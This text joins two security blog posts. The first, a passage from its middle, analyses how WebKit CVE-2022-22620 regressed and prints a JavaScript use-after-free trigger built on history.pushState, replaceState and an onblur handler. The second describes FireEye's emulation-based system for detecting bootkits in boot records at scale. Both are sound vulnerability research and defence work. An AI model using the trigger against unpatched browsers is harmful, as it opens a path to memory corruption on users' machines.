  • FrameLoader::loadInSameDocument changed to take stateObject as a raw pointer instead of PassRefPtr<SerializedScriptValue>
  • FrameLoader::loadInSameDocument changed to take stateObject as a RefPtr<SerializedScriptValue>

The Autopsy

When we look at the timeline of changes for FrameLoader::loadInSameDocument it seems that the bug was re-introduced in December 2016 due to refactoring. The question is, why did the patch author think that loadInSameDocument would not need to hold a reference. From the December 2016 commit ChangeLog: Take a raw pointer for the serialized script value state object. No one was passing ownership.

My assessment is that it’s due to the October 2016 changes in HistoryItem:stateObject. When the author was evaluating the refactoring changes needed in the dom directory in December 2016, it would have appeared that the only calls to loadInSameDocument passed in either a null value or the result of stateObject() which as of October 2016 now passed a raw SerializedScriptValue* pointer. When looking at those two options for the type of an argument, then it’s potentially understandable that the developer thought that loadInSameDocument did not need to share ownership of stateObject.

So why then was HistoryItem::stateObject’s return value changed from a RefPtr to a raw pointer in October 2016? That I’m struggling to find an explanation for.

According to the description, the patch in October 2016 was intended to “Replace all uses of ExceptionCodeWithMessage with WebCore::Exception”. However when we look at the ChangeLog it seems that the author decided to also do some (seemingly unrelated) refactoring to HistoryItem. These are some of the only changes in the commit whose descriptions aren’t related to exceptions. As an outsider looking at the commits, it seems that the developer by chance thought they’d do a little “clean-up” while working through the required refactoring on the exceptions. If this was simply an additional ad-hoc step while in the code, rather than the goal of the commit, it seems plausible that the developer and reviewers may not have further traced the full lifetime of HistoryItem::stateObject.

While the change to HistoryItem in October 2016 was not sufficient to introduce the bug, it seems that that change likely contributed to the developer in December 2016 thinking that loadInSameDocument didn’t need to increase the reference count on the stateObject.

Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions. It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they’re related to lifetime semantics.

The Zombie

We’ve now tracked down the evolution of changes to fix the 2013 vulnerability…and then revert those fixes… so I got back to identifying the 2022 bug. It’s the same bug, but triggered through a different path. That’s why the 2013 test case wasn’t crashing the version of WebKit that should have been vulnerable to CVE-2022-22620:

  1. The 2013 test case triggers the bug through the V8History::stateAccessorAndGetter path instead of FrameLoader::loadInSameDocument, and
  2. As a part of Sergei’s 2013 bug report there were additional hardening measures put into place that prevented user-code callbacks being processed during deserialization. 

Therefore we needed to figure out how to call loadInSameDocument and instead of using the deserialization to trigger a JavaScript callback, we needed to find another event in the loadInSameDocument function that would trigger the callback to user JavaScript.

To quickly figure out how to call loadInSameDocument, I modified the WebKit source code to trigger a test failure if loadInSameDocument was ever called and then ran all the tests in the fast/history directory. There were 5 out of the 80 tests that called loadInSameDocument:

The tests history-back-forward-within-subframe-hash.html and fast/history/history-traversal-is-asynchronous.html were the most helpful. We can trigger the call to loadInSameDocument by setting the history stack with an object whose location is the same page, but includes a hash. We then call history.back() to go back to that state that includes the URL with the hash. loadInSamePage is responsible for scrolling to that location.

history.pushState("state1", "", location + "#foo");

history.pushState("state2", ""); // current state

history.back(); //goes back to state1, triggering loadInSameDocument

 

Now that I knew how to call loadInSameDocument, I teamed up with Sergei to identify how we could get user code execution sometime during the loadInSameDocument function, but prior to the call to statePopped (FrameLoader.cpp#1158):

m_frame.document()->statePopped(stateObject ? Ref<SerializedScriptValue> { *stateObject } : SerializedScriptValue::nullValue());

The callback to user code would have to occur prior to the call to statePopped because stateObject was cast to a reference there and thus would now be reference-counted. We assumed that this would be the place where the “freed” object was “used”.

If you go down the rabbit hole of the calls made in loadInSameDocument, we find that there is a path to the blur event being dispatched. We could have also used a tool like CodeQL to see if there was a path from loadInSameDocument to dispatchEvent, but in this case we just used manual auditing. The call tree to the blur event is:

FrameLoader::loadInSameDocument

  FrameLoader::scrollToFragmentWithParentBoundary

    FrameView::scrollToFragment

      FrameView::scrollToFragmentInternal

        FocusController::setFocusedElement

          FocusController::setFocusedFrame

            dispatchWindowEvent(Event::create(eventNames().blurEvent, Event::CanBubble::No, Event::IsCancelable::No));

The blur event fires on an element whenever focus is moved from that element to another element. In our case loadInSameDocument is triggered when we need to scroll to a new location within the current page. If we’re scrolling and therefore changing focus to a new element, the blur event is fired on the element that previously had the focus.

The last piece for our trigger is to free the stateObject in the onblur event handler. To do that we call replaceState, which overwrites the current history state with a new object. This causes the final reference to be dropped on the stateObject and it’s therefore free’d. loadInSameDocument still uses the free’d stateObject in its call to statePopped.

input = document.body.appendChild(document.createElement("input"));

a = document.body.appendChild(document.createElement("a"));

a.id = "foo";

history.pushState("state1", "", location + "#foo");

history.pushState("state2", "");

setTimeout(() => {

        input.focus();

        input.onblur = () => history.replaceState("state3", "");

        setTimeout(() => history.back(), 1000);

}, 1000);

In both the 2013 and 2022 cases, the root vulnerability is that the stateObject is not correctly reference-counted. In 2013, the developers did a great job of patching all the different paths to trigger the vulnerability, not just the one in the submitted proof-of-concept. This meant that they had also killed the vulnerability in loadInSameDocument. The refactoring in December 2016 then revived the vulnerability to enable it to be exploited in-the-wild and re-patched in 2022.

Conclusion

Usually when we talk about variants, they exist due to incomplete patches: the vendor doesn’t correctly and completely fix the reported vulnerability. However, for CVE-2022-22620 the vulnerability was correctly and completely fixed in 2013. Its fix was just regressed in 2016 during refactoring. We don’t know how long an attacker was exploiting this vulnerability in-the-wild, but we do know that the vulnerability existed (again) for 5 years: December 2016 until January 2022.

There’s no easy answer for what should have been done differently. The developers responding to the initial bug report in 2013 followed a lot of best-practices:

  • Patched all paths to trigger the vulnerability, not just the one in the proof-of-concept. This meant that they patched the variant that would become CVE-2022-22620.
  • Submitted a test case with the patch.
  • Detailed commit messages explaining the vulnerability and how they were fixing it.
  • Additional hardening measures during deserialization.

As an offensive security research team, we can make assumptions about what we believe to be the core challenges facing modern software development teams: legacy code, short reviewer turn-around expectations, refactoring and security efforts are generally under-appreciated and under-rewarded, and lack of memory safety mitigations. Developers and security teams need time to review patches, especially for security issues, and rewarding these efforts, will make a difference. It also will save the vendor resources in the long run. In this case, 9 years after a vulnerability was initially triaged, patched, tested, and released, the whole process had to be duplicated again, but this time under the pressure of in-the-wild exploitation.

While this case study was a 0-day in Safari/WebKit, this is not an issue unique to Safari. Already in 2022, we’ve seen in-the-wild 0-days that are variants of previously disclosed bugs targeting Chromium, Windows, Pixel, and iOS as well. It’s a good reminder that as defenders we all need to stay vigilant in reviewing and auditing code and patches.

BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)

Avg # Unique Boot Records (md5)

100-1000

428

1000-10000

4,738

10000+

8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

❌
❌